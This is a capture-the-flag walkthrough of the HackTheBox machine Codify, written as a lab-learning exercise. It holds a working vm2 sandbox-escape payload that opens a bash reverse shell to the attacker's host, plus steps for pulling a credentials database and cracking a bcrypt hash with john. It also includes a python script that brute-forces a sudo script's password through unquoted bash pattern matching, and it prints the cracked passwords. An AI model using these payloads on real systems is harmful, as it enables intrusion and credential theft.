HackTheBox - Codify

Tools

• nmap
• netcat
• sqlite3
• python

Getting User

Nmap

┌──(kali㉿kali)-[~/HTB/Codify]
└─$ sudo nmap -sS -oA nmap/initial_scan 10.129.65.42
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-11 23:31 EST
Nmap scan report for 10.129.65.42
Host is up (0.13s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

┌──(kali㉿kali)-[~/HTB/Codify]
└─$ sudo nmap -sC -sV -p 22,80,3000 -oA nmap/script_scan 10.129.65.42
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-11 23:32 EST
Nmap scan report for 10.129.65.42
Host is up (0.13s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 96:07:1c:c6:77:3e:07:a0:cc:6f:24:19:74:4d:57:0b (ECDSA)
|_  256 0b:a4:c0:cf:e2:3b:95:ae:f6:f5:df:7d:0c:88:d6:ce (ED25519)
80/tcp   open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://codify.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Codify
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds

Foothold

add vhost to /etc/hosts

┌──(kali㉿kali)-[~]
└─$ echo "10.129.65.42 codify.htb" | sudo tee -a /etc/hosts   
[sudo] password for kali: 
10.129.65.42 codify.htb

Going to the site, it’s a nodejs sandbox environment which has an escape vulnerability.
With a bit of searching, I found an exploit which can be used to escape the environment https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac

Used nc to listen to port 1234 and ran the exploit to get a reverse shell

┌──(kali㉿kali)-[~/HTB/Codify]
└─$ nc -lnvp 1234
listening on [any] 1234 ...

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("bash -c 'exec bash -i &>/dev/tcp/10.10.14.6/1234 <&1'").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

vm.run(code);

I find the user is using pm2 to run the webserver

See running processes

svc@codify:~$ pm2 ps

Show information about the process

svc@codify:~$ pm2 desc 0
pm2 desc 0
 Describing process with id 0 - name index 
┌───────────────────┬───────────────────────────────────────┐
│ status            │ online                                │
│ name              │ index                                 │
│ namespace         │ default                               │
│ version           │ N/A                                   │
│ restarts          │ 0                                     │
│ uptime            │ 33m                                   │
│ script path       │ /var/www/editor/index.js              │
│ script args       │ N/A                                   │
│ error log path    │ /home/svc/.pm2/logs/index-error-0.log │
│ out log path      │ /home/svc/.pm2/logs/index-out-0.log   │
│ pid path          │ /home/svc/.pm2/pids/index-0.pid       │
│ interpreter       │ node                                  │
│ interpreter args  │ N/A                                   │
│ script id         │ 0                                     │
│ exec cwd          │ /home/svc                             │
│ exec mode         │ cluster_mode                          │
│ node.js version   │ 18.17.1                               │
│ node env          │ N/A                                   │
│ watch & reload    │ ✘                                     │
│ unstable restarts │ 0                                     │
│ created at        │ 2023-09-12T17:19:27.612Z              │
└───────────────────┴───────────────────────────────────────┘

Found the directory /var/www/contact
Directory contains index.js and tickets.db
Inspecting index.js, we see it saves user credentials to the db
Started a python http server to download tickets.db

svc@codify:/var/www/contact$ python3 -m http.server 5555
python3 -m http.server 5555
10.10.14.6 - - [12/Nov/2023 05:04:23] "GET /tickets.db HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/HTB/Codify/files]
└─$ wget http://codify.htb:5555/tickets.db                                                         
--2023-11-12 00:04:32--  http://codify.htb:5555/tickets.db
Resolving codify.htb (codify.htb)... 10.129.65.42
Connecting to codify.htb (codify.htb)|10.129.65.42|:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/octet-stream]
Saving to: ‘tickets.db’

tickets.db                                         100%[================================================================================================================>]  20.00K  --.-KB/s    in 0.1s    

2023-11-12 00:04:33 (151 KB/s) - ‘tickets.db’ saved [20480/20480]

We get joshua user but the password is encrypted

┌──(kali㉿kali)-[~/HTB/Codify/files]
└─$ sqlite3 tickets.db                     
SQLite version 3.43.1 2023-09-11 12:01:27
Enter ".help" for usage hints.
sqlite> .tables
tickets  users  
sqlite> select * from users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
sqlite> 

We use john to crack the password

┌──(kali㉿kali)-[~/HTB/Codify/files]
└─$ john password.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1       (?)     
1g 0:00:00:09 DONE (2023-11-12 00:15) 0.1106g/s 151.3p/s 151.3c/s 151.3C/s winston..angel123
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Now we have the following credentials which we can use to login and get the flag

joshua
spongebob1

joshua@codify:~$ ls
user.txt
joshua@codify:~$ cat user.txt

Getting Root

Information Gathering

sudo -l shows we have permission to run a bash script

joshua@codify:/opt/scripts$ sudo -l
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:
    (root) /opt/scripts/mysql-backup.sh

Privilege Escalation

Reading https://mywiki.wooledge.org/BashPitfalls#A.5B_.24foo_.3D_.22bar.22_.5D, I understand that when using [[, if the right hand side of the conditional is not wrapped in quotes it will perform pattern matching when followed by *, not literal.
So we can try to brute force the password using python.

import string
import subprocess
all = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in all:
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True).stdout

        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        found = True

We get the password and login to root

joshua@codify:~$ python3 script.py
k
kl
klj
kljh
kljh1
kljh12
kljh12k
kljh12k3
kljh12k3j
kljh12k3jh
kljh12k3jha
kljh12k3jhas
kljh12k3jhask
kljh12k3jhaskj
kljh12k3jhaskjh
kljh12k3jhaskjh1
kljh12k3jhaskjh12
kljh12k3jhaskjh12k
kljh12k3jhaskjh12kj
kljh12k3jhaskjh12kjh
kljh12k3jhaskjh12kjh3

joshua@codify:~$ su
Password: 
root@codify:/home/joshua# cd /root
root@codify:~# cat root.txt